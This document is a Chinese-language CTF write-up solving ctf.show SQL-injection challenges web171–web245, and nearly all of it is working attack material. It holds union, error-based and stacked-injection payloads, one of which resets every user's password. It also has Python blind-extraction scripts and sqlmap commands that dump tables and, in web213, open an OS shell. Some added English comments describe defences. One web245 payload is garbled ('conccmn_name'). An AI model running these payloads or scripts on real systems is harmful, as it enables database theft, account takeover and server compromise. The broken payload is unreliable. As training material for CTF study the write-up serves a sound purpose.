目录
web171
web172
web173
web174
web175
web176
web177-179
web180-183
web184
web185
web187
web190
web191
web192
web193
web194
web195
web196
web197
web199
web201
web202
web203
web204
web205
web206
web207
web208
web209
web210
web211
web212
web213
web225
web245
web171
获取库名:1'union select 1,group_concat(schema_name),3 from information_schema.schemata%23
获取表名:1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
获取字段名:1'union select 1,group_concat(password,username),3 from ctfshow_user%23
web172
这里可以使用to_base64进行编码。
1'union select 1,to_base64(password) from ctfshow_user where username="flag"%23
web173
使用16进制进行转换
1' union select 1,hex(password),3 from ctfshow_user3 where username='flag'%23
web174
进行写文件
1' union select 1,password from ctfshow_user4 into outfile '/var/www/html/1.txt'--+&page=1&limit
打开1.txt获取flag
web175
这里可以使用脚本跑
import requests
def get_pwd_len(url):
    """Binary-search the length of one stored value through a time-based oracle.

    Each probe injects a conditional ``sleep(2)``; a request that exceeds the
    0.5 s client timeout is read as "condition true", a prompt reply as
    "condition false". Prints the converged length and returns None.

    Args:
        url: endpoint that takes the ``id``, ``page`` and ``limit`` query
            parameters.

    Defensive note: the only signal used here is response time, which exists
    because the ``id`` value is spliced into the query text; a parameterized
    query removes it.
    """
    head = 1
    tail = 100
    ans = 0
    while head < tail:
        mid = (head + tail ) >> 1
        payload = f"1'&&if(length((select(password)from(ctfshow_user5)where(id=26)))>{mid},sleep(2),0)#"
        # print(uname)
        param = {
            'id': payload,
            'page': '1',
            'limit': '10'
        }
        # Unconditional probe with no timeout; its response is never read.
        res = requests.get(url=url,params=param)
        try:
            r = requests.get(url,params=param,timeout=0.5)
            # Answered within the timeout: the length is not greater than mid.
            tail = mid
            ans = mid
        except Exception as e :
            # Timed out (any exception is treated the same): the length exceeds mid.
            head = mid +1
    print(ans)
# passwd长度为:45
# Instance-specific challenge host; the probe runs at import time.
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd_len(url)
def get_pwd(url):
    """Recover a 45-character value one character at a time with a time-based oracle.

    For each position ``i`` the printable range 32..126 is binary-searched with
    the same sleep/timeout oracle as ``get_pwd_len``. The i-th character is
    isolated with two ``substr ... from`` calls around ``reverse()`` instead of
    ``substr(s, i, 1)`` (see the note after this script: no spaces or commas).
    Stops at the first position that resolves to code 32. Prints the
    accumulated string and returns None.

    Args:
        url: endpoint that takes the ``id``, ``page`` and ``limit`` query
            parameters.
    """
    ans = ""
    for i in range(1, 46):
        # print(i)
        j = 46 - i
        # print(j)
        head = 32
        tail = 127
        while head <tail:
            mid = (head + tail) >> 1 # >> is the shift operator; one right shift halves the value
            payload = f"1'&&if(ascii(substr((reverse(substr((select(password)from(ctfshow_user5)where(id=26))from({i}))))from({j})))>{mid},sleep(2),0)#"
            # print(uname)
            param = {
                'id': payload,
                'page': '1',
                'limit': '10'
            }
            try:
                res = requests.get(url=url,params=param,timeout=0.5)
                # Prompt reply: the character code is not greater than mid.
                tail = mid
            except Exception as e:
                # Timeout (or any other error): the character code exceeds mid.
                head = mid + 1
        if head != 32:
            ans += chr(head)
        else:
            # The lower bound was never raised: read as "no character here".
            break
    print(ans)
# Same instance host as above; the extraction runs at import time.
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd(url)
无空格和逗号
web176
使用大小写绕过
-1'uNion seleCt 1,groUp_concAt(username,password),3 frOm ctfshow_user%23
web177-179
使用括号绕过:-1'union(select(1),(group_concat(username,password)),(3)from(ctfshow_user))%23
使用注释绕过:-1'union/**/select/**/1,group_concat(username,password),3/**/from/**/ctfshow_user%23
反引号绕过:-1'union/**/select`id`,`username`,`password`from`ctfshow_user`%23
web180-183
过滤了注释符:
-1'union%0cselect(1),(group_concat(username,password)),(3)from(ctfshow_user)where(1)and'1
web184
过滤了很多,这里使用脚本测试
使用脚本
import requests
# Instance-specific challenge host and the known flag prefix the search starts from.
url="http://6ca99d4f-ef75-4808-92e8-5fc1a7b9548e.challenge.ctf.show/select-waf.php"
flag="ctfshow{"
def str_to_hex(s):
    """Concatenate the hexadecimal code of each character of *s*, without ``0x`` prefixes.

    Codes below 0x10 contribute a single digit, exactly as ``hex()`` would.
    """
    digits = []
    for ch in s:
        digits.append(format(ord(ch), 'x'))
    return ''.join(digits)
# Extend the flag one character per hit: each request appends a candidate and
# asks whether ``pass LIKE '<prefix>%'`` leaves exactly one row. The oracle is
# the literal "$user_count = 1" appearing in the response body.
# Defensive note: the readable signal is a server-computed row count echoed
# into the page; with tableName validated against an allow-list and no count
# echoed there is nothing to read.
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        data={
            #'tableName':"ctfshow_user a inner join ctfshow_user b on b.pass like {}".format("0x"+str_to_hex(flag+j+"%"))
            'tableName':f"ctfshow_user group by pass having pass like {'0x'+str_to_hex(flag+j+'%')}"
        }
        r=requests.post(url=url,data=data).text
        if "$user_count = 1" in r:
            flag+=j
            print(flag)
            # Closing brace ends the flag; otherwise move on to the next position.
            if j=='}':
                exit()
            break
这里使用了like模糊查询。
web185
数字的表示,使用脚本
import requests
# Instance-specific challenge host and the known flag prefix.
url = "http://47b18d10-5722-4603-961a-2ef4d5b872d8.challenge.ctf.show/select-waf.php"
flag = 'ctfshow{'
def createNum(n):
    """Return *n* ``true`` terms joined by ``+`` (a single ``'true'`` when n < 2).

    Used to spell an integer without digit characters.
    """
    term_count = max(n, 1)
    return '+'.join(['true'] * term_count)
# Probe the flag at position i (1-based) with candidate code j. Every number in
# the condition is spelled via createNum() (see the heading above). Positions
# 1-8 are the known "ctfshow{" prefix and are skipped. The oracle is the
# literal "$user_count = 43;" in the response body.
for i in range(45):
    if i <= 8:
        continue
    for j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{createNum(i)},{createNum(1)})regexp(char({createNum(j)})))"
        }
        r = requests.post(url, data=data)
        if r.text.find("$user_count = 43;") > 0:
            # regexp('.') matches any character, so a '.' hit is ignored and
            # the scan continues; any other hit is taken as this position.
            if chr(j) != ".":
                flag += chr(j)
                print(flag.lower())
                if chr(j) == "}":
                    exit(0)
                break
web187
load_file盲注
import requests
# Instance-specific challenge host and the known flag prefix.
url="http://17e6ad41-8c34-4fb3-aa23-f9fbfc11d012.challenge.ctf.show/api/index.php"
flag="ctfshow{"
# Extend the flag one character per hit. The injected condition applies
# regexp() to the contents of the server's own index.php, read with
# load_file(); the oracle is whether the raw (JSON-escaped) body contains
# "\u5bc6\u7801\u9519\u8bef", i.e. 密码错误 ("wrong password").
# Defensive note: load_file() needs the FILE privilege and a readable path;
# a DB account without FILE (and secure_file_priv set) removes this channel.
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        payload="if((load_file('/var/www/html/api/index.php'))regexp('{}'),0,1)".format(flag+j)
        data={
            'username':payload,
            'password':1
        }
        r=requests.post(url=url,data=data)
        if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break
web190
无过滤的盲注
import requests
# Instance-specific challenge host.
url = "http://87a2c8d4-69ca-4617-b96c-ce3601bdc1a6.challenge.ctf.show/api/"
result = ""
i = 0
# Character-by-character extraction with a boolean oracle: for position i the
# printable range 32..126 is binary-searched. The injected if() yields '1' when
# the character code is greater than mid, which (as the branch below relies on)
# makes the username clause match and the server answer "密码错误" (wrong
# password); otherwise it yields '2' and a different message comes back.
# Defensive note: two distinguishable login failures (unknown user vs. wrong
# password) are the oracle; one generic failure message removes it.
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Table-name query (result: ctfshow_fl0g)
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # Column-name query (result: id,f1ag)
        #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # Flag query
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(ascii(substr(({payload}),{i},1))>{mid},1,2)='1",
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误" == r.json()['msg']:
            # Condition held: the code is above mid.
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        # Lower bound never raised: no further characters.
        break
print(result)
web191
ord函数盲注
Author:Y4tacker
import requests
# Instance-specific challenge host.
url = "http://646c4493-3a66-407e-8ddf-c59355418a23.challenge.ctf.show/api/"
result = ""
i = 0
# Same binary-search extraction as the previous script, with ord() in place of
# ascii() (see the heading above). "密码错误" (wrong password) in the JSON msg
# means the injected comparison held.
# Defensive note: as before, a single generic login-failure message removes
# the oracle this loop reads.
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Table-name query (result: ctfshow_fl0g)
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # Column-name query (result: f1ag)
        #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # Flag query
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(ord(substr(({payload}),{i},1))>{mid},1,2)='1",
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误" == r.json()['msg']:
            # Condition held: the code is above mid.
            head = mid + 1
        else:
            # print(r.text)
            tail = mid
    # Assigned but never read.
    last = result
    if head != 32:
        result += chr(head)
    else:
        # Lower bound never raised: no further characters.
        break
print(result)
web192
过滤了ord和ascii函数
import requests
import string
# Instance-specific challenge host.
url = "http://2c0073f7-8662-4a12-a742-f17e1818ed0a.chall.ctf.show/api/"
# Candidate alphabet tried at each position, in this order.
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
# Linear scan per position (no ord()/ascii() available, see the heading): the
# injected condition compares the i-th character against candidate j with
# regexp(). "密码错误" (wrong password) in the JSON msg means the comparison held.
for i in range(1,45):
    for j in flagstr:
        payload = f"admin' and if(substr((select group_concat(f1ag) from ctfshow_fl0g),{i},1)regexp('{j}'),1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            flag += j
            print(flag)
            if "}" == j:
                exit(0)
            break
web193
过滤了substr
Author:feng
import requests
# Instance-specific challenge host; the flag is built from an empty prefix.
url='http://fc1e9e65-4116-4635-aebc-05e37fef775f.challenge.ctf.show/api/'
flag=""
# Prefix extension with LIKE (no substr available, see the heading): each
# request asks whether the value matches '<prefix><candidate>%'. The oracle is
# the JSON-escaped text \u5bc6\u7801\u9519\u8bef (密码错误, wrong password)
# in the raw response body; the comparison string is a raw literal so the
# backslashes are matched verbatim.
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-,{}_":
        #payload="' or if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}',1,0)-- -".format(flag+j+"%")
        #payload="' or if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg') like '{}',1,0)-- -".format(flag+j+"%")
        payload="' or if((select group_concat(f1ag) from ctfshow_flxg) like '{}',1,0)-- -".format(flag+j+"%")
        data={
            'username':payload,
            'password':1
        }
        #print(payload)
        r=requests.post(url=url,data=data)
        #print(payload)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break
web194
locate()正则注入
Author:Y4tacker
import requests
# Presumably instr() and similar functions would work too: LOCATE, POSITION, INSTR, FIND_IN_SET, IN, LIKE
# Instance-specific challenge host.
url = "http://dee436de-268a-408e-b66a-88b4c972e5f5.chall.ctf.show/api/"
final = ""
# Candidate alphabet; "flag{}" is placed first so the expected prefix is tried early.
stttr = "flag{}-_1234567890qwertyuiopsdhjkzxcvbnm"
# Greedy prefix extension with locate(): the candidate is appended first, the
# server is asked whether the value starts with it (locate(...)=1), and it is
# dropped again on a miss. There is no break after a hit, so the inner loop
# simply continues with the next candidate appended; the outer loop only
# bounds the number of passes over the alphabet.
for i in range(1,45):
    for j in stttr:
        final += j
        # Table-name query - ctfshow_flxg
        # payload = f"admin' and if(locate('{final}',(select table_name from information_schema.tables where table_schema=database() limit 0,1))=1,1,2)='1"
        # Column-name query - f1ag
        # payload = f"admin' and if(locate('{final}',(select column_name from information_schema.columns where table_name='ctfshow_flxg' limit 1,1))=1,1,2)='1"
        payload = f"admin' and if(locate('{final}',(select f1ag from ctfshow_flxg limit 0,1))=1,1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误" == r.json()['msg']:
            # Hit: keep the appended character and print the prefix so far.
            print(final)
        else:
            # Miss: drop the trial character.
            final = final[:-1]
web195
堆叠注入,这里使用16进制
前面的是admin,后面的是111,就是将所有用户的密码修改为111,之后登陆即可。
使用16进制原因:$sql = "select pass from ctfshow_user where username = {$username};";(没有字符串单引号包围)
0x61646d696e;update`ctfshow_user`set`pass`=0x313131;
web196
payload:1;select(1)
web197
利用alter改名:1;alter table `ctfshow_user` change `pass` `feng` varchar(255); alter table `ctfshow_user` change `id` `pass` varchar(255)
import requests
# Instance-specific challenge host.
url = "http://5f5edc35-cd47-49e5-9252-5a3301edd9f3.challenge.ctf.show/api/"
# First iteration sends the stacked ALTER statements from the note above, which
# rotate the column names so that the former `id` column is read as `pass`.
# Every iteration then logs in as 0x61646d696e (hex literal for "admin") with
# the integer i as the password and stops on the first "登陆成功" (login
# successful) message.
# Defensive note: stacked statements and an unquoted username reaching the
# query text are what make this possible; single-statement execution with
# bound parameters, and a DB account without ALTER, remove it.
for i in range(100):
    if i == 0:
        data = {
            # Three adjacent literals are joined by implicit concatenation.
            'username': '0;alter table ctfshow_user change column `pass` `ppp` varchar(255);alter table ctfshow_user '
                        'change column `id` `pass` varchar(255);alter table ctfshow_user change column `ppp` `id` '
                        'varchar(255);',
            'password': f'{i}'
        }
        r = requests.post(url, data=data)
    data = {
        'username': '0x61646d696e',
        'password': f'{i}'
    }
    r = requests.post(url, data=data)
    if "登陆成功" in r.json()['msg']:
        print(r.json()['msg'])
        break
# Observed output: 登陆成功 (login successful) flag is ctfshow{1e8cd464-117c-4863-a8ea-0e7b83d3d9fe}
web199
payload:
1;show tables
ctfshow_user
show tables;会显示表名,也就是ctfshow_user。这时会将查出来的这个值当成密码,也就是密码为ctfshow_user。
sqlmap注入
web201
referer绕过
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web --T ctfshow_user --dump --batch
web202
data绕过:
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web --T ctfshow_user --dump --batch
web203
请求方式绕过(必须加index.php)
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain"--batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web --T ctfshow_user --dump --batch
web204
包含cookie
>python sqlmap.py -u http://41ecd4df-c94a-4612-af16-2b0b6c834e9e.challenge.ctf.show/api/index.php --data="id=1" --method=PUT --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=5gqkmm2fh7l226lf4s9q4nl444; ctfshow=885b1983b7f7963b7d736fd8b93c185f" -D ctfshow_web -T ctfshow_user --dump --batch
web205
访问安全连接
它先访问的getToken,
--safe-url 设置在测试目标地址前访问的安全链接
--safe-freq 设置两次注入测试前访问安全链接的次数
python sqlmap.py -u http://158eb741-2a3a-4643-a9d6-94360dc171b9.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://158eb741-2a3a-4643-a9d6-94360dc171b9.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flax -C flagx --dump --batch
web206
符号闭合
python sqlmap.py -u http://cd7e2227-9bd9-4929-9e06-ae3781d38591.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://cd7e2227-9bd9-4929-9e06-ae3781d38591.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web --prefix="')" --suffix="#"-T ctfshow_flax --dump --batch
--prefix:前置闭合
--suffix:后置闭合
web207
--tamper 自己编写的脚本
python sqlmap.py -u http://7a02b099-af2d-45fe-9a06-562855b134c9.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://7a02b099-af2d-45fe-9a06-562855b134c9.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web207 --batch -D ctfshow_web -T ctfshow_flaxca -C flagvc --dump
web208
大小写空格前后包含
python sqlmap.py -u "http://fafc4bcc-ec09-4b48-96d1-665c8e7e967d.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://fafc4bcc-ec09-4b48-96d1-665c8e7e967d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --prefix="')" --tamper="space2comment(替换空格),randomcase(替换大小写)" --batch -D ctfshow_web -T ctfshow_flaxcac -C flagvca --dump
web209
过滤了星号等号和空格
编写脚本web209
python sqlmap.py -u http://aa386482-7cfb-4336-b39a-ae4c279921a4.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://aa386482-7cfb-4336-b39a-ae4c279921a4.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web209 -D ctfshow_web -T ctfshow_flav -C ctfshow_flagx --dump
web210
对base64进行解码
python sqlmap.py -u http://1c7a89da-dee8-4374-9d72-d1cdedb9583a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://1c7a89da-dee8-4374-9d72-d1cdedb9583a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavi -C ctfshow_flagxx --dump
web211
绕过翻转字符/
python sqlmap.py -u http://cd0fdb00-049a-4e5a-8ce1-547261224fb3.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://cd0fdb00-049a-4e5a-8ce1-547261224fb3.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavia -C ctfshow_flagxxa --dump
web212
过滤单引号空格,继续使用210脚本
sqlmap>python sqlmap.py -u http://e44ed589-be5e-4423-8e2c-4bca30a67e6c.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://e44ed589-be5e-4423-8e2c-4bca30a67e6c.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavis --dump
web213
使用os-shell一键getshell
python sqlmap.py -u http://517718e5-3471-4848-9ecf-ac4b22a4a01e.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://517718e5-3471-4848-9ecf-ac4b22a4a01e.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web210 --dump --os-shell --batch
上传文件后进行命令执行操作。
web225
堆叠注入handler读取数据。
payload:
?username=1';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;handler ctfshow_flagasa close;&page=1&limit=10
报错注入
web245
模板
api/?id=1' and extractvalue(1,concat(0x7e,([]),0x7e))-- #&page=1&limit=10
表名
api/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))-- #&page=1&limit=10
字段名
api/?id=1' and extractvalue(1,conccmn_name) from information_schema.columns where table_name='ctfshow_flagsa'),0x7e))-- #&page=1&limit=10
数据 分开读
api/?id=1' and extractvalue(1,concat(0x7e,(select left(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10
api/?id=1' and extractvalue(1,concat(0x7e,(select right(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10
api/?id=1' and extractvalue(1,concat(0x7e,(select left(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10